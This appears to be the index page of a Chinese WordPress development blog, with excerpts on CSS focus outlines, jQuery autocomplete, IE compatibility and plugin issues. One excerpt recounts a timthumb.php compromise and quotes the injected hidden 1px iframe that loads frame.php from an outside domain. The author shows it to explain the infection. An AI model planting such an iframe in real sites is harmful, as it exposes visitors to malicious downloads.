WP笔记

timthumb漏洞导致iframe攻击,wp-settings.php被修改

wordpress主题中一个很常用的处理图片的工具timthumb.php因为远程存储文件时候的验证上不足而产生了漏洞,允许在cache文件夹中执行一些php脚本,这已经不是什么秘密,可我就是中了招。 某天打开网站,发现服务器上所有的wordpress网站在firefox中都会打开一个弹出窗口,提示下载frame.php,这应该不是代码本意,不知道我的firefox出了啥问题,其实是在源代码里多了隐藏的iframe,用firebug查看源代码,可以看到下面的内容

<iframe id="iframe" src="%20http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px;">

继续阅读timthumb漏洞导致iframe攻击,wp-settings.php被修改
WP笔记

WP eStore移植后数据全部丢失

今天折腾的WP网站装了个收费的ecommerce插件,叫WP eStore,说实话感觉这个插件并不比免费的强大多少,还是很多人买。按照移植WordPress的方法折腾完,看起来很不错一切都没问题,访问到Store页面的时候,问题来了,eStore的shortcode报错,说指定的id不存在咋回事。

继续阅读WP eStore移植后数据全部丢失
生活琐记

Ultra QuickTime Converter – MOV转FLV工具

MOV即QuickTime影片格式,它是Apple公司开发的一种音频、视频文件格式,用于存储常用数字媒体类型。当选择QuickTime(*.mov)作为“保存类型”时,动画将保存为.mov文件。QuickTime因具有跨平台、存储空间要求小等技术特点,而采用了有损压缩方式的MOV格式文件,画面效果较AVI格式要稍微好一些。

继续阅读Ultra QuickTime Converter – MOV转FLV工具
WordPress主题开发

通过CSS禁止Chrome自动为输入框添加橘黄色边框

Chrome默认会为所有的输入框加上橘黄色的边框,虽然有时候可以使我们的网站看起来更友好,但对自定义的样式是有影响的。

例如做了一个圆角框的input输入框,如果没有对边框focus时的属性做任何休息,Chrome将默认加上一个正方形的边框,无视你将input的border设为none的命令。

为了避免麻烦我们可以禁止chrome为被激活的输入框添加边框,方法如下:

1. 禁止为所有被激活的输入框添加边框
*:focus { outline: none; }

2. 禁止为被激活的输入框添加边框,例如

.class1:focus{ outline:none }

3. 也可以自定义输入框被激活时的边框样式

.changeborder:focus { outline:Blue Solid 4px;}

继续阅读通过CSS禁止Chrome自动为输入框添加橘黄色边框
WP笔记

jquery autocomplete实例:国家选择器

Jquery Autocomplete Plugin 可以用来自动填写表单,类似google suggest,可以给用户更好的体验。

你可以先查看实例

例如,很多表单要求我们填写国家,如果是下拉列表,我们需要从长长的一个列表中选择自己的国家,为了不看的眼花缭乱,我们会用键盘的导航键快速选择,例如要选择中国我们可以选中下拉列表按键盘的“C”键,找到以c开头的国家再找到China。这样还是不够简单迅速。那么来看看下面这个输入式国家选择器,是不是会方便很多。

用户不需要从长长的列表中选择国家了,只需要键入国家的英文名称开头几个字母,这个选择器就会自动提供可供选择的项目,类似google suggest,帮助用户轻轻松松完成国家的选择。

另外,用户完成选择后可以定义一个回调函数,实现更多的功能。例如,选择国家后显示该国家的货币和汇率,或者显示某些房地产信息之类的。可以做的应用很多。

该功能主要依靠JQuery的Autocomplete插件来完成。

[download id=”10″]

继续阅读jquery autocomplete实例:国家选择器
PHP开发

SSL加密不完全的https页面在IE中弹出警告的解决方式

IE8以及更低版本IE浏览器在浏览SSL加密https网页时,会弹出一个警告窗口,警告用户该网页存在不安全内容,是否只查看安全内容,如果选是,往往会看到一个凌乱不堪的网页,很多图片都无法显示。从开发者角度讲,应该尽量避免这种情况发生。

理论上讲只要使用ssl加密的网页存在混合内容(mixed content),就会触发安全警报,混合内容就是指http和https共存的页面内容,实际测试时发现,并不是所有的http链接都会触发安全警告,只有以下几种情况会。

继续阅读SSL加密不完全的https页面在IE中弹出警告的解决方式
PHP开发

谨防浏览器的怪异模式捣乱

最近研究一个oscommerce的模板,IE浏览器总是出一堆奇奇怪怪的问题,比如载入的时候图片和文字还存在,等网站全部载入完毕后这些图片和文字就莫名其妙的消失了,开始以为是绝对定位有问题,搞了很久没效果,偶然在IE的调试工具中看见Quirks模式,一下搞明白了。。。

怪异模式,与DTD声明密切相关,如果DTD声明漏写,就会使浏览器按照怪异模式解析。DTD(Document Type Definition)即文档类型定义,它给你的HTML文档定义了一个规范,这个规范里有很多规则,你的HTML标签是大写还是小写,是否需要闭合等是不是正确就取决于这个规范。不同DTD会影响浏览器解析同一个网页的方式。浏览器解析网页时可以按照标准模式和怪异模式来进行。标准模式是我们现在最常用的模式,而怪异模式是给旧版本浏览器使用的,例如IE4,Navigator 4。如果用怪异模式解析一个按照现在W3C标准书写的网页,可能就要出错了。

继续阅读谨防浏览器的怪异模式捣乱
WP笔记

移除Magpress主题的footer链接看wordpress免费主题安全性

最近发现一个主题网站叫mapgress.com,主题功能很不错,无论是前台外观还是后台功能都不输给收费主题,应客户的要求拿来三个主题开始做定制化。开始做的时候就发现了,这个网站主题的footer代码不可以更改!无论是删除全部链接,还是添加自己的链接都不行!

继续阅读移除Magpress主题的footer链接看wordpress免费主题安全性
WP笔记

cufon字体IE浏览器兼容性问题

cufon字体可以让我们在网页上使用自定义的字体,实现和图片一样的效果。cufon字体的使用可以参考文章Cufon-网页设计师必备字体效果

通常情况下,cufon只支持使用简单的标签,你不能使用一些级联选择器,例如#menu ul li等等。经过测试发现,firefox和chrome都支持这种选择方式,但IE不支持。最简单的方法就是引入一个选择器引擎来帮助我们实现这个功能,例如jQuery,这样js引用情况如下:

继续阅读cufon字体IE浏览器兼容性问题
WP笔记

Wordpress CKEditor smiley表情图标定制化

Wordpress默认的编辑器不是很好用,我习惯将它替换成CKEditor,安装CKEditor For WordPress即可。安装后编辑器将被替换,评论框的编辑器默认会被替换成CKEditor,有时候会导致模板样式错乱,可以在CKEditor->Basic Settings中禁用。

定制表情的方法

CKEditor默认的smiley表情不适合中国,我们可以将表情改造一下换成自己喜欢的表情,方法如下。

继续阅读Wordpress CKEditor smiley表情图标定制化